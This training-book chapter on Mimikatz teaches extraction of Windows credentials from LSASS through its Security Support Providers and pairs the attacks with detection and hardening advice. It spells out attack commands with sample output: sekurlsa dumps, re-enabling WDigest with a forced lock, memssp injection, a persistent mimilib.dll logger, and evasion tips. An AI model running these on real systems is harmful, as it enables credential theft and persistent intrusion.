Chapter 19: LSASS Security Support Providers - Credential Extraction

Introduction

If there's one command that defines Mimikatz in the collective consciousness of the security community, it's sekurlsa::logonpasswords. This single command has launched a thousand penetration tests and forced Microsoft to fundamentally rethink how Windows handles credentials in memory. In my experience, understanding what this command actually does—and why it works—is essential for both effective offensive operations and meaningful defensive improvements.

The reason sekurlsa::logonpasswords is so powerful isn't magic; it's architecture. Windows was designed to provide Single Sign-On (SSO), meaning users shouldn't have to re-enter their passwords every time they access a network resource. To deliver that experience, Windows keeps authentication material readily available in LSASS memory. Security Support Providers (SSPs) are the modular components that handle different authentication protocols, and each one maintains its own cache of secrets. Mimikatz simply knows where to look.

I often tell students that understanding SSPs is the key to understanding Windows credential theft. Each SSP tells a story about what authentication happened on this system: NTLM authentications leave hashes, Kerberos authentications leave tickets, RDP sessions might leave cleartext passwords. When you dump credentials with sekurlsa::logonpasswords, you're reading that story from memory.

In this chapter, we'll explore each SSP in detail, understand what secrets they store and why, and cover both the extraction commands and the more advanced techniques for real-time credential interception using malicious SSPs.

Technical Foundation

The SSP Architecture

Security Support Providers are DLLs that implement authentication protocols in Windows. They're loaded by LSASS at boot time and handle the cryptographic operations needed for various authentication scenarios.

How SSPs Are Loaded

1. Registration: SSPs are registered in the registry at HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
2. Loading: LSASS loads each registered SSP DLL during system startup
3. Initialization: Each SSP initializes its internal data structures for credential caching
4. Operation: SSPs handle authentication requests throughout the system's uptime

Default SSPs in Windows

SSP DLL	Protocol	What It Stores
msv1_0.dll	NTLM/LM	NTLM hashes, LM hashes (if enabled)
kerberos.dll	Kerberos	TGTs, service tickets, session keys
wdigest.dll	HTTP Digest	Cleartext passwords (if enabled)
tspkg.dll	CredSSP/Terminal Services	Cleartext passwords for RDP
livessp.dll	Microsoft Account	Live account credentials
cloudap.dll	Azure AD	Primary Refresh Tokens
schannel.dll	TLS/SSL	Certificate credentials

Why SSPs Cache Credentials

The fundamental reason LSASS is "full of loot" comes down to protocol design requirements:

NTLM (MSV1_0): NTLM is a challenge-response protocol. The hash itself is sufficient to respond to authentication challenges, so the hash must be kept available for subsequent authentications.

Kerberos: Kerberos tickets have limited lifetimes but are reused for multiple service accesses. The TGT and derived session keys must be cached to request service tickets without re-authentication.

WDigest: The HTTP Digest algorithm requires the cleartext password to compute the authentication response. There's no hash-based shortcut, so the actual password must be stored.

CredSSP (TsPkg): When you RDP to a server and then access network resources from that server, your credentials need to be delegated. This delegation often requires the cleartext password.

Memory Layout and Encryption

LSASS doesn't store credentials in plaintext (mostly). Each SSP encrypts its cached credentials using keys stored in lsasrv.dll. The encryption varies by Windows version:

Pre-Windows 10:

• 3DES encryption with keys in lsasrv.dll
• Relatively straightforward to decrypt once you find the keys

Windows 10/Server 2016+:

• AES encryption
• Keys are still in lsasrv.dll but in different structures
• Mimikatz handles both automatically

Credential Isolation and Protection

Modern Windows includes several mechanisms to protect these cached credentials:

Protection	Effect on SSP Extraction
LSA Protection (PPL)	Blocks unauthorized LSASS access
Credential Guard	Moves secrets to isolated VM
Remote Credential Guard	Prevents credential caching during RDP
WDigest Disabled	No cleartext in wdigest

Command Reference

sekurlsa::logonpasswords

The comprehensive command that extracts credentials from all SSPs for all logon sessions.

Syntax:

mimikatz # sekurlsa::logonpasswords

Prerequisites:

• Administrator privileges
• Debug privilege enabled (privilege::debug)
• LSA Protection not enabled (or bypassed)

Example Output:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WORKSTATION$
Domain            : CORP
Logon Server      : (null)
Logon Time        : 2/5/2026 8:00:00 AM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : WORKSTATION$
         * Domain   : CORP
         * NTLM     : 7a118f7a2f2b34d61fa19b840b4f5203
         * SHA1     : 83f2b4c9...
        tspkg :
        wdigest :
        kerberos :
         * Username : WORKSTATION$
         * Domain   : CORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Authentication Id : 0 ; 453821 (00000000:0006eb3d)
Session           : Interactive from 1
User Name         : admin
Domain            : CORP
Logon Server      : DC01
Logon Time        : 2/5/2026 9:15:32 AM
SID               : S-1-5-21-...-1001
        msv :
         [00000003] Primary
         * Username : admin
         * Domain   : CORP
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a1b2c3d4...
         * DPAPI    : 01020304...
        tspkg :
         * Username : admin
         * Domain   : CORP
         * Password : P@ssw0rd123!
        wdigest :
         * Username : admin
         * Domain   : CORP
         * Password : (null)
        kerberos :
         * Username : admin
         * Domain   : CORP.LOCAL
         * Password : (null)
        ssp :
        credman :

Understanding the Output:

Each logon session is displayed with:

• Authentication Id: The LUID (Logon Unique Identifier)
• Session: Type of logon (Interactive, Service, Network, etc.)
• User/Domain/SID: Account identification
• Per-SSP credentials: Each SSP's cached secrets

sekurlsa::msv

Extracts only NTLM/LM hashes from the MSV1_0 SSP.

Syntax:

mimikatz # sekurlsa::msv

Parameters:

Parameter	Description
(none)	Extract from all sessions
/user:<username>	Filter to specific user

Example:

mimikatz # sekurlsa::msv

Authentication Id : 0 ; 453821 (00000000:0006eb3d)
Session           : Interactive from 1
User Name         : admin
Domain            : CORP
        msv :
         [00000003] Primary
         * Username : admin
         * Domain   : CORP
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a1b2c3d4e5f6...
         * DPAPI    : 01020304050607080910...

Operational Note: Use this when you only need hashes for Pass-the-Hash and want cleaner output.

sekurlsa::wdigest

Extracts credentials from the WDigest SSP.

Syntax:

mimikatz # sekurlsa::wdigest

Example (WDigest Enabled):

mimikatz # sekurlsa::wdigest

Authentication Id : 0 ; 453821 (00000000:0006eb3d)
Session           : Interactive from 1
User Name         : admin
Domain            : CORP
        wdigest :
         * Username : admin
         * Domain   : CORP
         * Password : P@ssw0rd123!

Example (WDigest Disabled - Default):

mimikatz # sekurlsa::wdigest

Authentication Id : 0 ; 453821 (00000000:0006eb3d)
Session           : Interactive from 1
User Name         : admin
Domain            : CORP
        wdigest :
         * Username : admin
         * Domain   : CORP
         * Password : (null)

sekurlsa::tspkg

Extracts credentials from the TsPkg (Terminal Services Package) SSP, used for RDP authentication.

Syntax:

mimikatz # sekurlsa::tspkg

Example:

mimikatz # sekurlsa::tspkg

Authentication Id : 0 ; 453821 (00000000:0006eb3d)
Session           : Interactive from 1
User Name         : admin
Domain            : CORP
        tspkg :
         * Username : admin
         * Domain   : CORP
         * Password : P@ssw0rd123!

Operational Note: TsPkg often contains cleartext passwords even when WDigest is disabled, especially for RDP sessions with Network Level Authentication (NLA).

sekurlsa::kerberos

Extracts Kerberos credentials including tickets and encryption keys.

Syntax:

mimikatz # sekurlsa::kerberos

Example:

mimikatz # sekurlsa::kerberos

Authentication Id : 0 ; 453821 (00000000:0006eb3d)
Session           : Interactive from 1
User Name         : admin
Domain            : CORP
        kerberos :
         * Username : admin
         * Domain   : CORP.LOCAL
         * Password : (null)

         Group 0 - Ticket Granting Service
          [00000000]
            Start/End/MaxRenew: ...
            Service Name: LDAP/DC01.corp.local
            Target Name: LDAP/DC01.corp.local
            Client Name: admin
            Flags: ...
            Session Key: 0x00000012 - aes256_hmac

         Group 2 - Ticket Granting Ticket
          [00000000]
            Start/End/MaxRenew: ...
            Service Name: krbtgt/CORP.LOCAL
            ...

sekurlsa::credman

Extracts credentials from Credential Manager that are cached in LSASS.

Syntax:

mimikatz # sekurlsa::credman

sekurlsa::tickets

Exports Kerberos tickets to .kirbi files.

Syntax:

mimikatz # sekurlsa::tickets [/export]

Parameters:

Parameter	Description
/export	Save tickets to disk as .kirbi files

sekurlsa::ekeys

Extracts Kerberos encryption keys (AES, RC4/NTLM) for all sessions.

Syntax:

mimikatz # sekurlsa::ekeys

Example:

mimikatz # sekurlsa::ekeys

Authentication Id : 0 ; 453821 (00000000:0006eb3d)
Session           : Interactive from 1
User Name         : admin
Domain            : CORP
        * aes256_hmac: 4a3c8e9f2d1b0a7c6e5f4d3c2b1a0987654321fedcba0987654321fedcba09
        * aes128_hmac: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d
        * rc4_hmac_nt: cc36cf7a8514893efccd332446158b1a

Operational Note: Use this for Over-Pass-the-Hash when you want AES keys instead of NTLM hashes.

sekurlsa::dpapi

Extracts DPAPI master key information from logon sessions.

Syntax:

mimikatz # sekurlsa::dpapi

WDigest: Enabling Cleartext Credential Capture

The WDigest "Feature"

WDigest was designed for HTTP Digest authentication, which requires the cleartext password to compute responses. Until Windows 8.1/Server 2012 R2, Windows cached these cleartext passwords in LSASS by default. Microsoft then added a registry setting to disable this caching, and disabled it by default in newer versions.

However, the "feature" can be re-enabled with administrator access, and credentials will be cached on the next interactive logon.

Enabling WDigest Caching

Registry Setting:

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    UseLogonCredential = 1 (DWORD)

PowerShell:

Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -Name 'UseLogonCredential' -Value 1 -Type DWord

Command Line:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

The Lock-and-Unlock Attack

After enabling WDigest, you need to trigger a new authentication to cache the password:

Step 1: Enable WDigest (as Admin)

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Step 2: Force Workstation Lock

rundll32.exe user32.dll,LockWorkStation

Step 3: Wait for User to Unlock

The user enters their password to unlock, which triggers the WDigest caching.

Step 4: Extract Cleartext Password

mimikatz # sekurlsa::wdigest

Authentication Id : 0 ; 453821 (00000000:0006eb3d)
        wdigest :
         * Username : admin
         * Domain   : CORP
         * Password : P@ssw0rd123!

Operational Considerations for WDigest

1. Requires relogon: Existing sessions won't have passwords cached until the user re-authenticates.

2. Persistence risk: Enabling WDigest modifies the registry, which may be monitored.

3. Alternative triggers: Beyond lock/unlock:

   • runas /user:domain\user cmd
   • RDP disconnection and reconnection
   • Service restart with "Log on as" account

4. Detection opportunity: Registry modification is highly detectable.

Real-Time Credential Interception: Malicious SSPs

Beyond passive extraction, Mimikatz can inject code into LSASS to capture credentials in real-time as users authenticate.

misc::memssp - In-Memory SSP Injection

This command patches LSASS memory to inject a lightweight credential logger. Every authentication thereafter logs credentials to a file.

Syntax:

mimikatz # misc::memssp

What Happens:

1. Mimikatz opens LSASS with write access
2. Injects a small SSP stub into LSASS memory
3. Hooks the authentication path
4. All subsequent authentications are logged to C:\Windows\System32\mimilsa.log

Example Log Output (mimilsa.log):

[00000000:0006eb3d] CORP\admin P@ssw0rd123!
[00000000:0007a2c1] CORP\helpdesk Summer2026!
[00000000:0008b3d2] CORP\sqlservice SQLp@ss!

Characteristics:

• Pros: No file dropped initially, captures all new authentications
• Cons: Does not survive reboot, requires write access to LSASS
• Detection: Sysmon Event ID 8 (CreateRemoteThread), Event ID 10 (ProcessAccess)

Persistent SSP Installation: mimilib.dll

For persistent credential capture, you can install mimilib.dll as a legitimate SSP.

Step 1: Copy mimilib.dll to System32

copy mimilib.dll C:\Windows\System32\

Step 2: Register as Security Package

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "Security Packages" /t REG_MULTI_SZ /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /f

Step 3: Reboot

After reboot, LSASS loads mimilib.dll as a legitimate SSP.

Step 4: Harvest Credentials

All authentications are logged to C:\Windows\System32\kiwissp.log

Characteristics:

• Pros: Survives reboots, completely passive
• Cons: File on disk, registry modification, easily detected
• Detection: File integrity monitoring, registry monitoring, DLL loading events

Security Package Comparison

Method	Persistence	Artifacts	Detection Difficulty
sekurlsa::logonpasswords	None	Memory access	Medium
misc::memssp	Until reboot	Memory injection, log file	Medium-High
mimilib.dll installation	Permanent	DLL file, registry, log file	Low (easily detected)

Attack Scenarios

Scenario 1: Complete Credential Harvest on Compromised Workstation

Context: You've gained admin access to a workstation and want all available credentials.

Step 1: Enable Debug Privilege

mimikatz # privilege::debug
Privilege '20' OK

Step 2: Comprehensive Dump

mimikatz # sekurlsa::logonpasswords

Step 3: Analyze Results

• Note NTLM hashes for Pass-the-Hash
• Check for cleartext passwords in tspkg/wdigest
• Identify any service accounts
• Look for Kerberos tickets for delegation attacks

Step 4: Extract Kerberos Keys (for Over-Pass-the-Hash)

mimikatz # sekurlsa::ekeys

Step 5: Export Tickets (for Pass-the-Ticket)

mimikatz # sekurlsa::tickets /export

Scenario 2: Cleartext Password Capture via WDigest

Context: You need a cleartext password for an attack that won't work with just a hash (e.g., some legacy applications, password reuse testing).

Step 1: Check Current WDigest Status

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

Step 2: Enable WDigest if Disabled

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

Step 3: Trigger Re-authentication

rundll32.exe user32.dll,LockWorkStation

Step 4: Wait and Extract

mimikatz # sekurlsa::wdigest

wdigest :
 * Username : targetuser
 * Domain   : CORP
 * Password : ActualPassword123!

Step 5: Clean Up (Optional)

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

Scenario 3: Long-Term Credential Harvesting

Context: You have persistent access and want to collect credentials over time.

Option A: In-Memory (Shorter Term)

mimikatz # misc::memssp

Check back periodically:

type C:\Windows\System32\mimilsa.log

Option B: Persistent (Longer Term)

Drop mimilib.dll and register it (see above).

After several days, harvest:

type C:\Windows\System32\kiwissp.log

Scenario 4: Extracting Specific User Credentials

Context: You know which user you need and want targeted extraction.

Using /user Filter (where supported):

mimikatz # sekurlsa::logonpasswords /user:targetuser

Manual Filtering: Run full dump and search output for the target username.

Detection and IOCs

Process Access Detection (Sysmon Event ID 10)

When Mimikatz reads LSASS memory, it generates detectable access patterns.

High-Fidelity Detection:

<Event>
  <EventData>
    <Data Name="SourceImage">C:\temp\mimikatz.exe</Data>
    <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
    <Data Name="GrantedAccess">0x1010</Data>
  </EventData>
</Event>

Access Masks to Watch:

Mask	Meaning	Risk
0x1010	PROCESS_QUERY_LIMITED_INFORMATION + PROCESS_VM_READ	High
0x1410	Above + PROCESS_QUERY_INFORMATION	High
0x143a	Full credential dump access	Critical
0x1fffff	PROCESS_ALL_ACCESS	Critical

Detection Logic:

• Alert on non-system processes accessing LSASS
• Build allowlist of legitimate accessors (AV, EDR, Windows Defender)
• Focus on unexpected executables and unusual parent processes

Thread Injection Detection (Sysmon Event ID 8)

The misc::memssp command uses CreateRemoteThread, which is logged by Sysmon.

Sample Event:

<Event>
  <EventData>
    <Data Name="SourceImage">C:\temp\mimikatz.exe</Data>
    <Data Name="TargetImage">C:\Windows\system32\lsass.exe</Data>
    <Data Name="NewThreadId">1234</Data>
    <Data Name="StartFunction">0x7ff...</Data>
  </EventData>
</Event>

Detection Logic:

• Any remote thread creation targeting LSASS is highly suspicious
• Very few legitimate tools create threads in LSASS

Image Load Detection (Sysmon Event ID 7)

Detecting malicious SSP DLL loading.

Sample Event:

<Event>
  <EventData>
    <Data Name="Image">C:\Windows\system32\lsass.exe</Data>
    <Data Name="ImageLoaded">C:\Windows\System32\mimilib.dll</Data>
    <Data Name="Signed">false</Data>
    <Data Name="Signature">N/A</Data>
  </EventData>
</Event>

Detection Logic:

• Alert on unsigned DLLs loaded into LSASS
• Alert on DLLs not on a known-good list
• Monitor Security Packages registry key for changes

Registry Modification Detection

WDigest Enable:

EventCode=4657 OR EventCode=13 (Sysmon)
TargetObject contains "WDigest"
Details contains "UseLogonCredential"

Security Packages Modification:

EventCode=4657 OR EventCode=13 (Sysmon)
TargetObject contains "Lsa\Security Packages"

File Creation Detection

Log Files:

• C:\Windows\System32\mimilsa.log
• C:\Windows\System32\kiwissp.log

Detection:

• Sysmon Event ID 11 (FileCreate)
• File integrity monitoring on System32

Network-Based Detection

Remote credential extraction (via psexec + Mimikatz, CrackMapExec, etc.) generates:

Indicator	Description
SMB to ADMIN$/IPC$	Initial access
Service creation	Remote execution
LSASS access from remote service	Actual extraction

Defensive Strategies

1. Enable LSA Protection (RunAsPPL)

Protected Process Light prevents unauthorized access to LSASS.

Implementation:

HKLM\SYSTEM\CurrentControlSet\Control\Lsa
RunAsPPL = 1 (DWORD)

Impact: Standard Mimikatz sekurlsa:: commands fail. Attackers must use kernel drivers (mimidrv.sys) or exploit vulnerabilities.

2. Deploy Windows Credential Guard

Credential Guard isolates secrets in a virtualization-based security (VBS) container.

Requirements:

• UEFI firmware with Secure Boot
• Virtualization extensions (Intel VT-x/AMD-V)
• Windows 10 Enterprise/Education or Windows Server 2016+

Impact: NTLM hashes, Kerberos keys, and DPAPI secrets are not accessible from LSASS memory.

3. Verify WDigest is Disabled

Check:

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

If not set or set to 0: WDigest caching is disabled (default on modern Windows).

Monitoring: Alert on any changes to this registry value.

4. Enable Remote Credential Guard for RDP

Prevents credential delegation during RDP sessions.

Group Policy:

Computer Configuration > Administrative Templates > System > Credentials Delegation
> Restrict delegation of credentials to remote servers

5. Implement Tiered Administration

Ensure privileged accounts only authenticate to systems of equal or higher tier. Domain Admin credentials should never touch workstations.

6. Monitor LSASS Access

Deploy Sysmon with proper configuration to log:

• Event ID 10 (ProcessAccess) for LSASS
• Event ID 8 (CreateRemoteThread) targeting LSASS
• Event ID 7 (ImageLoad) for LSASS

7. Application Control

Block unauthorized executables from running, especially tools known for credential theft.

Example (AppLocker/WDAC):

• Block unsigned executables
• Block executables from user-writable directories
• Allowlist known-good applications

Comparison: sekurlsa Commands

Command	Output	Use Case
sekurlsa::logonpasswords	All SSPs, all sessions	Comprehensive initial dump
sekurlsa::msv	NTLM/LM hashes only	Pass-the-Hash preparation
sekurlsa::wdigest	Cleartext passwords	Legacy auth, password reuse
sekurlsa::tspkg	RDP credentials	Terminal services targeting
sekurlsa::kerberos	Kerberos tickets/keys	Ticket attacks
sekurlsa::ekeys	Encryption keys	Over-Pass-the-Hash with AES
sekurlsa::tickets	Export tickets to files	Pass-the-Ticket
sekurlsa::credman	Credential Manager	Saved credentials
sekurlsa::dpapi	DPAPI keys	DPAPI attacks

Operational Considerations

OPSEC Implications

Action	Detection Risk	Notes
sekurlsa::logonpasswords	Medium-High	LSASS access is logged by most EDR
WDigest registry modification	High	Registry changes are commonly monitored
misc::memssp	High	Thread injection is highly suspicious
mimilib.dll installation	Very High	File + registry + DLL load

When to Use Each Technique

Use sekurlsa::logonpasswords when:

• You need immediate situational awareness
• EDR/AV is not present or is already evaded
• Time-sensitive operation (smash and grab)

Use WDigest manipulation when:

• You specifically need cleartext passwords
• You have persistence and can wait
• Target environment doesn't monitor registry

Use misc::memssp when:

• You need to capture credentials over time
• You can accept the injection risk
• Reboot is unlikely soon

Avoid mimilib.dll installation when:

• Stealth is important
• File integrity monitoring is present
• You don't need persistent capture

Common Failure Modes

Error	Cause	Solution
ERROR kuhl_m_sekurlsa_acquireLSA	Not running as admin	Elevate privileges
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory	LSA Protection enabled	Use mimidrv.sys or alternative approach
0 ; 0 for NTLM hashes	Credential Guard enabled	Secrets are in VBS container
(null) for wdigest	WDigest caching disabled	Enable via registry
Process access denied	EDR blocking	Evade or use alternative technique

Practical Lab Exercises

Exercise 1: Comprehensive Credential Extraction

Objective: Extract all available credentials from a lab system.

Steps:

1. Run Mimikatz as Administrator

2. Enable debug privilege:

   mimikatz # privilege::debug

3. Dump all credentials:

   mimikatz # sekurlsa::logonpasswords

4. Document:

   • How many logon sessions exist?
   • Which users have NTLM hashes?
   • Are any cleartext passwords visible?
   • What Kerberos tickets are cached?

Exercise 2: WDigest Manipulation

Objective: Enable WDigest and capture a cleartext password.

Steps:

1. Check current WDigest status:

   reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

2. Enable WDigest:

   reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

3. Lock the workstation:

   rundll32.exe user32.dll,LockWorkStation

4. Unlock with password

5. Extract with Mimikatz:

   mimikatz # sekurlsa::wdigest

6. Verify cleartext password is captured

7. Clean up:

   reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

Exercise 3: Real-Time Credential Capture

Objective: Use memssp for credential harvesting.

Steps:

1. Run Mimikatz as Administrator

2. Inject memssp:

   mimikatz # misc::memssp

3. Lock and unlock the workstation

4. Check the log:

   type C:\Windows\System32\mimilsa.log

5. Clean up (requires reboot to fully remove)

Exercise 4: Detection Validation

Objective: Verify your detection capabilities.

Steps:

1. Ensure Sysmon is installed and configured

2. Run sekurlsa::logonpasswords

3. Check Sysmon Event ID 10:

   Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational';ID=10} |
     Where-Object { $_.Message -match 'lsass' } | Select -First 5

4. Run misc::memssp

5. Check Sysmon Event ID 8:

   Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational';ID=8} |
     Where-Object { $_.Message -match 'lsass' }

6. Document what was and wasn't detected

Summary

The sekurlsa module is the heart of Mimikatz's credential extraction capabilities:

• SSPs store credentials for SSO: NTLM hashes in MSV1_0, tickets in Kerberos, cleartext in WDigest/TsPkg
• sekurlsa::logonpasswords is the comprehensive tool: Use it first for situational awareness
• WDigest can be weaponized: Enable it, trigger re-authentication, capture cleartext
• Malicious SSPs enable persistent capture: misc::memssp for in-memory, mimilib.dll for persistent
• Detection is possible: LSASS access, thread injection, DLL loading, and registry changes are all observable
• LSA Protection and Credential Guard are effective: They fundamentally change what's accessible

Understanding SSPs and how Mimikatz extracts their secrets is essential for both red and blue teams. Attackers need to know which commands to use and what operational risks they carry. Defenders need to understand what's being accessed to build effective detection and deploy appropriate protections.

---

Next: Chapter 20: LSASS Memory DumpPrevious: Chapter 18: LSA Secrets